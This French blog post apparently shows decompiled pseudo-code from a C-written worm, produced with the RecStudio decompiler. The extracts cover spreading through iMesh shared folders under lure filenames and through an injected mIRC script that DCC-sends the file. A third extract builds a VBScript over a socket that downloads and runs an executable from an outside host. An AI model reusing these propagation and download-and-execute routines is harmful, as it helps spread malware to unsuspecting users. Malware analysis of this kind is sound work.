Internet Lab
Catégories
- Actualité (13)
- Rumeurs et Hoaxes (2)
- Vers, Virus et Malwares (7)
- Trouver une Info, du Contenu (3)
- Images Bizarres (3)
- Videos (1)
- Utilitaires (3)
- Liens (4)
- Divers (6)
- Snippets (34)
- Graph 65 (4)
- Game Boy Hacking (2)
- Bidouille Grenouille (26)
- Retro Computing et Emulation (7)
- Crypto et Terato (12)
- Code Memories (8)
- Yugioh (4)
Album photos
Recommander
La Bete étant écrite en C, ça donne une occasion de s'amuser avec RecStudio.
Le source pseudo-code obtenu est interessant, quelques extraits:
Propagation iMesh
esp = esp - 0xc;
RegOpenKeyExA(-2147483646, "SOFTWAREiMeshClient", 0, 131097, & Vfffffff4);
esp = esp - 8;
RegQueryValueExA(Vfffffff4, "DownloadsLocation", 0, 0, & Vfffff5e8, & Vfffff4e4);
esp = esp - 0xc;
RegCloseKey(Vfffffff4);
esp = esp - 0xc;
(save) & Vfffff5e8;
esp = esp + 0x10;
Vfffffff0 = L004071D0();
if(Vfffffff0 != 0) {
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%ssasser.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sMydoom.b Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sSober Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sJalabed Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sJokes.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sLovsan Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sWorm Writting Tutorial.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
esp = esp - 4;
(save) & Vfffff5e8;
sprintf( & Vfffff6e8, "%sFizzer Source.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffee8, & Vfffff6e8, 0);
}
Bricolage avec Mirc
L004017F8()
{
/* unknown */ void Vfffffbe8;
CHAR Vfffffce8;
char Vfffffde8;
/* unknown */ void Vfffffff0;
struct _IO_FILE * Vfffffff4;
esp = esp - 4;
(save)0x100;
(save) & Vfffffce8;
GetModuleFileNameA(0);
esp = esp - 8;
(save)0x100;
eax = & Vfffffbe8;
GetWindowsDirectoryA(eax);
esp = esp - 4;
(save) & Vfffffbe8;
sprintf( & Vfffffde8, "%sLink for new mirc.doc.exe");
esp = esp - 4;
CopyFileA( & Vfffffce8, & Vfffffde8, 0);
esp = esp - 0xc;
(save)"C:mirc";
L004071D0();
esp = esp + 0x10;
Vfffffff0 = eax;
if(Vfffffff0 != 0) {
esp = esp - 8;
Vfffffff4 = fopen("C:mircscript.ini", "w+");
esp = esp - 8;
fprintf(Vfffffff4, "[scritp]n");
esp = esp - 8;
fprintf(Vfffffff4, "n0=on 1:JOIN:#:{n");
esp = esp - 8;
fprintf(Vfffffff4, "n1= /if ( $nick == $me ) { halt }n");
esp = esp - 8;
fprintf(Vfffffff4, "n2= /msg $nick Here you have the link to the new mircn");
esp = esp - 4;
(save) & Vfffffde8;
fprintf(Vfffffff4, "n3= /.dcc send $nick %sn");
esp = esp - 8;
fprintf(Vfffffff4, "n4=}");
esp = esp - 0xc;
fclose(Vfffffff4);
}
return 0;
}
Génération de VBScript
esp = esp - 8;
strcpy(ebp + -110056, "echo Dim DataBin >c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Dim HTTPGET >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo HTTPGET.Open "GET", "http://webdav.yy.xxxxx.de/wormbykhaled.exe", False >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo HTTPGET.Send >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo DataBin = HTTPGET.ResponseBody >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Const adTypeBinary=1 >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Const adSaveCreateOverWrite=2 >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Dim SendBinary >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo Set SendBinary = CreateObject("ADODB.Stream") >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo SendBinary.Type = adTypeBinary >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo SendBinary.Open >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo SendBinary.Write DataBin >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "echo SendBinary.SaveToFile "c:webdavbykh.exe", adSaveCreateOverWrite >>c:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 8;
strcpy(ebp + -110056, "start C:khaled.vbsn");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
esp = esp - 0xc;
(save)3;
_sleep();
esp = esp + 0x10;
esp = esp - 8;
strcpy(ebp + -110056, "start C:webdavbykh.exen");
send( *(ebp - 0x10), ebp + -110056, 10000, 0);
*(ebp + -110488) = 0;
Bon, pas eu le temps d'aller plus loin, mais une fois encore RecStudio est magique !
YOP
Ecrire un commentaire - Voir les commentaires - Recommander
Calendrier
| Novembre 2009 | ||||||||||
| L | M | M | J | V | S | D | ||||
| 1 | ||||||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 | ||||
| 9 | 10 | 11 | 12 | 13 | 14 | 15 | ||||
| 16 | 17 | 18 | 19 | 20 | 21 | 22 | ||||
| 23 | 24 | 25 | 26 | 27 | 28 | 29 | ||||
| 30 | ||||||||||
|
||||||||||
Commentaires